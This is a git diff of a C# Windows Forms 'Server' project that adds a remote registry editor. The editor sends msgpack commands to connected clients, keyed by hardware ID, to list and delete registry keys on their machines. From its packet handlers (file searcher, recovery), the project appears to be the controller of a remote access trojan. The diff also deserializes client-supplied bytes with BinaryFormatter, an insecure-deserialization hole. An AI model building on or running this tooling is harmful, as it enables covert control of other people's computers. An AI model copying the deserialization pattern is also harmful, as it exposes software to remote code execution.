System.Drawing.Size(198, 98); + // + // modifyToolStripMenuItem + // + this.modifyToolStripMenuItem.Enabled = false; + this.modifyToolStripMenuItem.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.modifyToolStripMenuItem.Name = "modifyToolStripMenuItem"; + this.modifyToolStripMenuItem.Size = new System.Drawing.Size(197, 22); + this.modifyToolStripMenuItem.Text = "Modify..."; + this.modifyToolStripMenuItem.Click += new System.EventHandler(this.modifyRegistryValue_Click); + // + // modifyBinaryDataToolStripMenuItem + // + this.modifyBinaryDataToolStripMenuItem.Enabled = false; + this.modifyBinaryDataToolStripMenuItem.Name = "modifyBinaryDataToolStripMenuItem"; + this.modifyBinaryDataToolStripMenuItem.Size = new System.Drawing.Size(197, 22); + this.modifyBinaryDataToolStripMenuItem.Text = "Modify Binary Data..."; + this.modifyBinaryDataToolStripMenuItem.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click); + // + // modifyToolStripSeparator1 + // + this.modifyToolStripSeparator1.Name = "modifyToolStripSeparator1"; + this.modifyToolStripSeparator1.Size = new System.Drawing.Size(194, 6); + // + // deleteToolStripMenuItem1 + // + this.deleteToolStripMenuItem1.Name = "deleteToolStripMenuItem1"; + this.deleteToolStripMenuItem1.Size = new System.Drawing.Size(197, 22); + this.deleteToolStripMenuItem1.Text = "Delete"; + this.deleteToolStripMenuItem1.Click += new System.EventHandler(this.deleteRegistryValue_Click); + // + // renameToolStripMenuItem1 + // + this.renameToolStripMenuItem1.Name = "renameToolStripMenuItem1"; + this.renameToolStripMenuItem1.Size = new System.Drawing.Size(197, 22); + this.renameToolStripMenuItem1.Text = "Rename"; + this.renameToolStripMenuItem1.Click += new System.EventHandler(this.renameRegistryValue_Click); + // + // lst_ContextMenuStrip + // + this.lst_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.newToolStripMenuItem1}); + this.lst_ContextMenuStrip.Name = "lst_ContextMenuStrip"; + this.lst_ContextMenuStrip.Size = new System.Drawing.Size(103, 26); + // + // newToolStripMenuItem1 + // + this.newToolStripMenuItem1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.keyToolStripMenuItem1, + this.toolStripSeparator4, + this.stringValueToolStripMenuItem1, + this.binaryValueToolStripMenuItem1, + this.dWORD32bitValueToolStripMenuItem1, + this.qWORD64bitValueToolStripMenuItem1, + this.multiStringValueToolStripMenuItem1, + this.expandableStringValueToolStripMenuItem1}); + this.newToolStripMenuItem1.Name = "newToolStripMenuItem1"; + this.newToolStripMenuItem1.Size = new System.Drawing.Size(102, 22); + this.newToolStripMenuItem1.Text = "New"; + // + // keyToolStripMenuItem1 + // + this.keyToolStripMenuItem1.Name = "keyToolStripMenuItem1"; + this.keyToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.keyToolStripMenuItem1.Text = "Key"; + this.keyToolStripMenuItem1.Click += new System.EventHandler(this.createNewRegistryKey_Click); + // + // toolStripSeparator4 + // + this.toolStripSeparator4.Name = "toolStripSeparator4"; + this.toolStripSeparator4.Size = new System.Drawing.Size(215, 6); + // + // stringValueToolStripMenuItem1 + // + this.stringValueToolStripMenuItem1.Name = "stringValueToolStripMenuItem1"; + this.stringValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.stringValueToolStripMenuItem1.Text = "String Value"; + this.stringValueToolStripMenuItem1.Click += new System.EventHandler(this.createStringRegistryValue_Click); + // + // binaryValueToolStripMenuItem1 + // + this.binaryValueToolStripMenuItem1.Name = "binaryValueToolStripMenuItem1"; + this.binaryValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.binaryValueToolStripMenuItem1.Text = "Binary Value"; + this.binaryValueToolStripMenuItem1.Click += new System.EventHandler(this.createBinaryRegistryValue_Click); + // + // dWORD32bitValueToolStripMenuItem1 + // + this.dWORD32bitValueToolStripMenuItem1.Name = "dWORD32bitValueToolStripMenuItem1"; + this.dWORD32bitValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.dWORD32bitValueToolStripMenuItem1.Text = "DWORD (32-bit) Value"; + this.dWORD32bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createDwordRegistryValue_Click); + // + // qWORD64bitValueToolStripMenuItem1 + // + this.qWORD64bitValueToolStripMenuItem1.Name = "qWORD64bitValueToolStripMenuItem1"; + this.qWORD64bitValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.qWORD64bitValueToolStripMenuItem1.Text = "QWORD (64-bit) Value"; + this.qWORD64bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createQwordRegistryValue_Click); + // + // multiStringValueToolStripMenuItem1 + // + this.multiStringValueToolStripMenuItem1.Name = "multiStringValueToolStripMenuItem1"; + this.multiStringValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.multiStringValueToolStripMenuItem1.Text = "Multi-String Value"; + this.multiStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click); + // + // expandableStringValueToolStripMenuItem1 + // + this.expandableStringValueToolStripMenuItem1.Name = "expandableStringValueToolStripMenuItem1"; + this.expandableStringValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22); + this.expandableStringValueToolStripMenuItem1.Text = "Expandable String Value"; + this.expandableStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click); + // + // timer1 + // + this.timer1.Tick += new System.EventHandler(this.timer1_Tick); + // + // FormRegistryEditor // this.AutoScaleDimensions = new System.Drawing.SizeF(96F, 96F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Dpi; @@ -610,7 +615,7 @@ namespace Server.Forms this.ForeColor = System.Drawing.Color.Black; this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); this.MainMenuStrip = this.menuStrip; - this.Name = "FrmRegistryEditor"; + this.Name = "FormRegistryEditor"; this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; this.Text = "Registry Editor []"; this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormRegistryEditor_FormClosed); @@ -636,7 +641,7 @@ namespace Server.Forms private System.Windows.Forms.TableLayoutPanel tableLayoutPanel; private System.Windows.Forms.SplitContainer splitContainer; - private RegistryTreeView tvRegistryDirectory; + public RegistryTreeView tvRegistryDirectory; private AeroListView lstRegistryValues; private System.Windows.Forms.StatusStrip statusStrip; private System.Windows.Forms.ToolStripStatusLabel selectedStripStatusLabel; @@ -693,5 +698,6 @@ namespace Server.Forms private System.Windows.Forms.ToolStripMenuItem multiStringValueToolStripMenuItem2; private System.Windows.Forms.ToolStripMenuItem expandableStringValueToolStripMenuItem2; private System.Windows.Forms.ToolStripSeparator modifyToolStripSeparator1; + public System.Windows.Forms.Timer timer1; } } \ No newline at end of file diff --git a/Server/Forms/FormRegistryEditor.cs b/Server/Forms/FormRegistryEditor.cs index 275a67b..9c287ca 100644 --- a/Server/Forms/FormRegistryEditor.cs +++ b/Server/Forms/FormRegistryEditor.cs @@ -7,6 +7,8 @@ using System.Windows.Forms; using Microsoft.Win32; using Server.Connection; using Server.Helper; +using Server.MessagePack; +using static Server.Helper.RegistrySeeker; namespace Server.Forms { @@ -95,6 +97,11 @@ namespace Server.Forms // signal client to retrive the root nodes (indicated by null) + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "regManager"; + msgpack.ForcePathObject("Command").AsString = "LoadRegistryKey"; + msgpack.ForcePathObject("RootKeyName").AsString = ""; + ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes()); //LoadRegistryKey(null); } @@ -143,7 +150,7 @@ namespace Server.Forms }; } - private void AddKeys(object sender, string rootKey, RegSeekerMatch[] matches) + public void AddKeys(string rootKey, RegSeekerMatch[] matches) { if (string.IsNullOrEmpty(rootKey)) { @@ -611,6 +618,12 @@ namespace Server.Forms { string parentPath = tvRegistryDirectory.SelectedNode.Parent.FullPath; + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "regManager"; + msgpack.ForcePathObject("Command").AsString = "deleteRegistryKey"; + msgpack.ForcePathObject("KeyName").AsString = tvRegistryDirectory.SelectedNode.Name; + msgpack.ForcePathObject("ParentPath").AsString = parentPath; + ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes()); //DeleteRegistryKey(parentPath, tvRegistryDirectory.SelectedNode.Name); } } @@ -789,5 +802,14 @@ namespace Server.Forms } #endregion + + public void timer1_Tick(object sender, EventArgs e) + { + try + { + if (!Client.TcpClient.Connected) this.Close(); + } + catch { this.Close(); } + } } } diff --git a/Server/Forms/FormRegistryEditor.resx b/Server/Forms/FormRegistryEditor.resx index 5d20015..14d7769 100644 --- a/Server/Forms/FormRegistryEditor.resx +++ b/Server/Forms/FormRegistryEditor.resx @@ -125,7 +125,7 @@ AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAADm - BwAAAk1TRnQBSQFMAwEBAAFIAQUBSAEFARABAAEQAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA + BwAAAk1TRnQBSQFMAwEBAAFgAQUBYAEFARABAAEQAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA AUADAAEQAwABAQEAAQgGAAEEGAABgAIAAYADAAKAAQABgAMAAYABAAGAAQACgAIAA8ABAAHAAdwBwAEA AfABygGmAQABMwUAATMBAAEzAQABMwEAAjMCAAMWAQADHAEAAyIBAAMpAQADVQEAA00BAANCAQADOQEA AYABfAH/AQACUAH/AQABkwEAAdYBAAH/AewBzAEAAcYB1gHvAQAB1gLnAQABkAGpAa0CAAH/ATMDAAFm @@ -169,7 +169,7 @@ AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAABk - CQAAAk1TRnQBSQFMAgEBAgEAAWgBBAFoAQQBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + CQAAAk1TRnQBSQFMAgEBAgEAAYABBAGAAQQBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo AwABQAMAARADAAEBAQABCAYAAQQYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA @@ -227,6 +227,9 @@ 907, 17 + + 1188, 17 + diff --git a/Server/Handle Packet/HandlerFileSearcher.cs b/Server/Handle Packet/HandleFileSearcher.cs similarity index 97% rename from Server/Handle Packet/HandlerFileSearcher.cs rename to Server/Handle Packet/HandleFileSearcher.cs index 5d34feb..e945e81 100644 --- a/Server/Handle Packet/HandlerFileSearcher.cs +++ b/Server/Handle Packet/HandleFileSearcher.cs @@ -11,7 +11,7 @@ using System.Windows.Forms; namespace Server.Handle_Packet { - public class HandlerFileSearcher + public class HandleFileSearcher { public async void SaveZipFile(Clients client, MsgPack unpack_msgpack) { diff --git a/Server/Handle Packet/HandleRegManager.cs b/Server/Handle Packet/HandleRegManager.cs new file mode 100644 index 0000000..566ecc4 --- /dev/null +++ b/Server/Handle Packet/HandleRegManager.cs @@ -0,0 +1,63 @@ +using Server.Connection; +using Server.Forms; +using Server.Helper; +using Server.MessagePack; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Runtime.Serialization.Formatters.Binary; +using System.Text; +using System.Threading.Tasks; +using System.Windows.Forms; + +namespace Server.Handle_Packet +{ + class HandleRegManager + { + public async void RegManager(Clients client, MsgPack unpack_msgpack) + { + try + { + switch (unpack_msgpack.ForcePathObject("Command").AsString) + { + case "setClient": + { + FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString]; + if (FM != null) + { + if (FM.Client == null) + { + client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString; + FM.Client = client; + FM.timer1.Enabled = true; + } + } + break; + } + case "LoadKey": + { + FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString]; + if (FM != null) + { + string rootKey = unpack_msgpack.ForcePathObject("RootKey").AsString; + byte[] Matchesbyte = unpack_msgpack.ForcePathObject("Matches").GetAsBytes(); + + BinaryFormatter formatter = new BinaryFormatter(); + MemoryStream mStream = new MemoryStream(); + mStream.Write(Matchesbyte, 0, Matchesbyte.Length); + mStream.Flush(); + mStream.Seek(0, SeekOrigin.Begin); + RegistrySeeker seeker = (RegistrySeeker)formatter.Deserialize(mStream); + + FM.AddKeys(rootKey, seeker.Matches); + } + break; + } + + } + } + catch { } + } + } +} diff --git a/Server/Handle Packet/Packet.cs b/Server/Handle Packet/Packet.cs index 8d91a16..265659b 100644 --- a/Server/Handle Packet/Packet.cs +++ b/Server/Handle Packet/Packet.cs @@ -174,7 +174,7 @@ namespace Server.Handle_Packet case "fileSearcher": { - new HandlerFileSearcher().SaveZipFile(client, unpack_msgpack); + new HandleFileSearcher().SaveZipFile(client, unpack_msgpack); break; } case "Information": @@ -197,6 +197,12 @@ namespace Server.Handle_Packet new HandleRecovery(client, unpack_msgpack); break; } + + case "regManager": + { + new HandleRegManager().RegManager(client, unpack_msgpack); + break; + } } })); } diff --git a/Server/Helper/Controls/Regedit.cs b/Server/Helper/Controls/Regedit.cs index 752282f..915590d 100644 --- a/Server/Helper/Controls/Regedit.cs +++ b/Server/Helper/Controls/Regedit.cs @@ -4,6 +4,7 @@ using System.Linq; using System.Text; using Microsoft.Win32; using ProtoBuf; +using static Server.Helper.RegistrySeeker; namespace Server.Helper { @@ -43,15 +44,4 @@ namespace Server.Helper } } } - public class RegValueData - { - [ProtoMember(1)] - public string Name { get; set; } - - [ProtoMember(2)] - public RegistryValueKind Kind { get; set; } - - [ProtoMember(3)] - public byte[] Data { get; set; } - } } diff --git a/Server/Helper/Controls/RegistryValueLstItem.cs b/Server/Helper/Controls/RegistryValueLstItem.cs index 7e81a89..fe5e675 100644 --- a/Server/Helper/Controls/RegistryValueLstItem.cs +++ b/Server/Helper/Controls/RegistryValueLstItem.cs @@ -1,4 +1,5 @@ using System.Windows.Forms; +using static Server.Helper.RegistrySeeker; namespace Server.Helper { diff --git a/Server/Helper/Methods.cs b/Server/Helper/Methods.cs index c2250be..e5cdbf4 100644 --- a/Server/Helper/Methods.cs +++ b/Server/Helper/Methods.cs @@ -1,8 +1,10 @@ using Microsoft.VisualBasic; +using Microsoft.Win32; using ProtoBuf; using Server.Algorithm; using Server.Handle_Packet; using System; +using System.Collections.Generic; using System.Diagnostics; using System.Drawing; using System.IO; @@ -121,21 +123,180 @@ namespace Server.Helper } - [ProtoContract] - public class RegSeekerMatch + public class RegistrySeeker { - [ProtoMember(1)] - public string Key { get; set; } - [ProtoMember(2)] - public RegValueData[] Data { get; set; } - - [ProtoMember(3)] - public bool HasSubKeys { get; set; } - - public override string ToString() + [Serializable] + public class RegSeekerMatch { - return $"({Key}:{Data})"; + public string Key { get; set; } + + public RegValueData[] Data { get; set; } + + public bool HasSubKeys { get; set; } + + public override string ToString() + { + return $"({Key}:{Data})"; + } + } + + [Serializable] + public class RegValueData + { + public string Name { get; set; } + + public RegistryValueKind Kind { get; set; } + + public byte[] Data { get; set; } + } + /// + /// The list containing the matches found during the search. + /// + private readonly List _matches; + + public RegSeekerMatch[] Matches => _matches?.ToArray(); + + public RegistrySeeker() + { + _matches = new List(); + } + + public void BeginSeeking(string rootKeyName) + { + if (!String.IsNullOrEmpty(rootKeyName)) + { + using (RegistryKey root = GetRootKey(rootKeyName)) + { + //Check if this is a root key or not + if (root != null && root.Name != rootKeyName) + { + //Must get the subKey name by removing root and '\' + string subKeyName = rootKeyName.Substring(root.Name.Length + 1); + using (RegistryKey subroot = root.OpenReadonlySubKeySafe(subKeyName)) + { + if (subroot != null) + Seek(subroot); + } + } + else + { + Seek(root); + } + } + } + else + { + Seek(null); + } + } + + private void Seek(RegistryKey rootKey) + { + // Get root registrys + if (rootKey == null) + { + foreach (RegistryKey key in GetRootKeys()) + //Just need root key so process it + ProcessKey(key, key.Name); + } + else + { + //searching for subkeys to root key + Search(rootKey); + } + } + + private void Search(RegistryKey rootKey) + { + foreach (string subKeyName in rootKey.GetSubKeyNames()) + { + RegistryKey subKey = rootKey.OpenReadonlySubKeySafe(subKeyName); + ProcessKey(subKey, subKeyName); + } + } + + private void ProcessKey(RegistryKey key, string keyName) + { + if (key != null) + { + List values = new List(); + + foreach (string valueName in key.GetValueNames()) + { + RegistryValueKind valueType = key.GetValueKind(valueName); + object valueData = key.GetValue(valueName); + values.Add(RegistryKeyHelper.CreateRegValueData(valueName, valueType, valueData)); + } + + AddMatch(keyName, RegistryKeyHelper.AddDefaultValue(values), key.SubKeyCount); + } + else + { + AddMatch(keyName, RegistryKeyHelper.GetDefaultValues(), 0); + } + } + + private void AddMatch(string key, RegValueData[] values, int subkeycount) + { + RegSeekerMatch match = new RegSeekerMatch { Key = key, Data = values, HasSubKeys = subkeycount > 0 }; + + _matches.Add(match); + } + + public static RegistryKey GetRootKey(string subkeyFullPath) + { + string[] path = subkeyFullPath.Split('\\'); + try + { + switch (path[0]) // <== root; + { + case "HKEY_CLASSES_ROOT": + return RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64); + case "HKEY_CURRENT_USER": + return RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64); + case "HKEY_LOCAL_MACHINE": + return RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); + case "HKEY_USERS": + return RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64); + case "HKEY_CURRENT_CONFIG": + return RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64); + default: + /* If none of the above then the key must be invalid */ + throw new Exception("Invalid rootkey, could not be found."); + } + } + catch (SystemException) + { + throw new Exception("Unable to open root registry key, you do not have the needed permissions."); + } + catch (Exception e) + { + throw e; + } + } + + public static List GetRootKeys() + { + List rootKeys = new List(); + try + { + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64)); + rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64)); + } + catch (SystemException) + { + throw new Exception("Could not open root registry keys, you may not have the needed permission"); + } + catch (Exception e) + { + throw e; + } + + return rootKeys; } } } diff --git a/Server/Helper/Controls/RegistryKeyExtensions.cs b/Server/Helper/RegistryKeyExtensions.cs similarity index 74% rename from Server/Helper/Controls/RegistryKeyExtensions.cs rename to Server/Helper/RegistryKeyExtensions.cs index 52e48eb..10cf650 100644 --- a/Server/Helper/Controls/RegistryKeyExtensions.cs +++ b/Server/Helper/RegistryKeyExtensions.cs @@ -1,8 +1,13 @@ -using System; -using Microsoft.Win32; +using Microsoft.Win32; +using System; +using System.Collections.Generic; +using System.Linq; namespace Server.Helper { + /// + /// Provides extensions for registry key and value operations. + /// public static class RegistryKeyExtensions { public static string RegistryTypeToString(this RegistryValueKind valueKind, object valueData) @@ -29,6 +34,30 @@ namespace Server.Helper } } + public static RegistryKey OpenReadonlySubKeySafe(this RegistryKey key, string name) + { + try + { + return key.OpenSubKey(name, false); + } + catch + { + return null; + } + } + + public static RegistryKey OpenWritableSubKeySafe(this RegistryKey key, string name) + { + try + { + return key.OpenSubKey(name, true); + } + catch + { + return null; + } + } + public static string RegistryTypeToString(this RegistryValueKind valueKind) { switch (valueKind) diff --git a/Server/Helper/RegistryKeyHelper.cs b/Server/Helper/RegistryKeyHelper.cs new file mode 100644 index 0000000..d15f035 --- /dev/null +++ b/Server/Helper/RegistryKeyHelper.cs @@ -0,0 +1,156 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using Microsoft.Win32; +using static Server.Helper.RegistrySeeker; + +namespace Server.Helper +{ + public static class RegistryKeyHelper + { + private static string DEFAULT_VALUE = String.Empty; + + /// + /// Adds a value to the registry key. + /// + /// Represents the possible values for a top-level node on a foreign machine. + /// The path to the registry key. + /// The name of the value. + /// The value. + /// If set to True, adds quotes to the value. + /// True on success, else False. + public static bool AddRegistryKeyValue(RegistryHive hive, string path, string name, string value, bool addQuotes = false) + { + try + { + using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path)) + { + if (key == null) return false; + + if (addQuotes && !value.StartsWith("\"") && !value.EndsWith("\"")) + value = "\"" + value + "\""; + + key.SetValue(name, value); + return true; + } + } + catch (Exception) + { + return false; + } + } + + /// + /// Opens a read-only registry key. + /// + /// Represents the possible values for a top-level node on a foreign machine. + /// The path to the registry key. + /// + public static RegistryKey OpenReadonlySubKey(RegistryHive hive, string path) + { + try + { + return RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenSubKey(path, false); + } + catch + { + return null; + } + } + + /// + /// Deletes the specified value from the registry key. + /// + /// Represents the possible values for a top-level node on a foreign machine. + /// The path to the registry key. + /// The name of the value to delete. + /// True on success, else False. + public static bool DeleteRegistryKeyValue(RegistryHive hive, string path, string name) + { + try + { + using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path)) + { + if (key == null) return false; + key.DeleteValue(name, true); + return true; + } + } + catch (Exception) + { + return false; + } + } + + /// + /// Checks if the provided value is the default value + /// + /// The name of the value + /// True if default value, else False + public static bool IsDefaultValue(string valueName) + { + return String.IsNullOrEmpty(valueName); + } + + /// + /// Adds the default value to the list of values and returns them as an array. + /// If default value already exists this function will only return the list as an array. + /// + /// The list with the values for which the default value should be added to + /// Array with all of the values including the default value + public static RegValueData[] AddDefaultValue(List values) + { + if(!values.Any(value => IsDefaultValue(value.Name))) + { + values.Add(GetDefaultValue()); + } + return values.ToArray(); + } + + /// + /// Gets the default registry values + /// + /// A array with the default registry values + public static RegValueData[] GetDefaultValues() + { + return new[] {GetDefaultValue()}; + } + + public static RegValueData CreateRegValueData(string name, RegistryValueKind kind, object value = null) + { + var newRegValue = new RegValueData {Name = name, Kind = kind}; + + if (value == null) + newRegValue.Data = new byte[] { }; + else + { + switch (newRegValue.Kind) + { + case RegistryValueKind.Binary: + newRegValue.Data = (byte[]) value; + break; + case RegistryValueKind.MultiString: + newRegValue.Data = ByteConverter.GetBytes((string[]) value); + break; + case RegistryValueKind.DWord: + newRegValue.Data = ByteConverter.GetBytes((uint) (int) value); + break; + case RegistryValueKind.QWord: + newRegValue.Data = ByteConverter.GetBytes((ulong) (long) value); + break; + case RegistryValueKind.String: + case RegistryValueKind.ExpandString: + newRegValue.Data = ByteConverter.GetBytes((string) value); + break; + } + } + + return newRegValue; + } + + private static RegValueData GetDefaultValue() + { + return CreateRegValueData(DEFAULT_VALUE, RegistryValueKind.String); + } + } +} diff --git a/Server/Server.csproj b/Server/Server.csproj index 05b7c88..b96a83c 100644 --- a/Server/Server.csproj +++ b/Server/Server.csproj @@ -284,7 +284,8 @@ - + + @@ -321,7 +322,6 @@ - Component @@ -332,6 +332,8 @@ WordTextBox.cs + +